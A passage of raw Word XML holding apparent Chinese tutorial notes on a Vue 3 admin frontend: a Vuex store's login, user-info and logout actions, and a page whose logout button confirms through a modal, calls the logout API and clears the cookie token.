        <w:t xml:space="preserve">                        setToken(res.token)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD8C3D1" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                        resolve(res)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DCEE29" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA96E71" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    .catch(err =&gt; reject(err))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FEACD5" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293941AB" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1499123E" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F5D9530" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取当前登录用户信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543122E9" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        getinfo({ commit }) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1521A1" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            return new Promise((resolve, reject) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B80749" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                getinfo()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFC67A5" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    .then(res =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D20DC8A" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                        commit('SET_USERINFO', res)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B96B6E" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                        resolve(res)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545B37DF" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7B48D8" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    .catch(err =&gt; reject)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A65058" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656543EA" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EB6343" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="794BF9D2" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRPr="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC5EA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC5EA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>退出登录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BBF07C" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRPr="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC5EA2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        logout({ commit }){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F05C759" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRPr="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC5EA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            // </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC5EA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>移除</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC5EA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC5EA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC5EA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBD7661" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRPr="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC5EA2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            removeToken()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7320EE" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRPr="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21C3456C" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRPr="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC5EA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            // </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC5EA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>清除当前用户状态</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC5EA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> vuex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4AF68E" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRPr="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC5EA2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            commit('SET_USERINFO', {})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E199DF" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC5EA2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD8FC9F" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116015DD" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E33784F" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="079B2AF2" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>export default store</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463BAC12" w14:textId="77777777" w:rsidR="005F6D50" w:rsidRDefault="005F6D50" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A450A66" w14:textId="0A0140C3" w:rsidR="005F6D50" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最终页面引用登出动作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pages</w:t>
      </w:r>
      <w:r>
        <w:t>/index.vue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45ACDF6B" w14:textId="77777777" w:rsidR="005F6D50" w:rsidRDefault="005F6D50" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4001F776" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267F365F" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79559F71" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后台首页</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D2B672" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02AE321F" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        {{ $store.state.user.username }}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC588A7" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0818741F" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC5EA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;el-button </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC5EA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>@click="handleLogout"</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC5EA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC5EA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>退出登录</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC5EA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;/el-button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2B80A3" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78F2A99B" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10618896" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C19DEA" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06D3CF10" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;script setup&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BB3D02" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRPr="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC5EA2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import { logout } from "~/api/manager"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58201EF0" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRPr="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC5EA2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import { showModal, toast } from '~/composables/util'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634FB347" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRPr="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC5EA2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import { useRouter } from 'vue-router'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039D9FAF" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC5EA2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import { useStore } from 'vuex'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5103BDD6" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17969C9A" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>const router = useRouter()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08027BF7" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>const store = useStore()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625A7929" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43E71035" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRPr="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC5EA2">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>function handleLogout() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126593D4" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRPr="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC5EA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    showModal("</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC5EA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>是否要退出登录</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC5EA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE4E5EF" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRPr="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC5EA2">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        .then(res =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3155EB53" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRPr="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC5EA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            // console.log("</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC5EA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>退出登录</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC5EA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48319F66" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRPr="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC5EA2">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            logout()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BCFA80" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRPr="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC5EA2">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                .then()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E2D04D" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRPr="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC5EA2">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                .catch()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165DDE9C" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRPr="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC5EA2">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                .finally(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A31C8D6" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRPr="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC5EA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                    // </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC5EA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>移除</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC5EA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC5EA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC5EA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F27C21" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRPr="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC5EA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                    // </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC5EA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>清除当前用户状态</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC5EA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> vuex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B90D548" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRPr="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
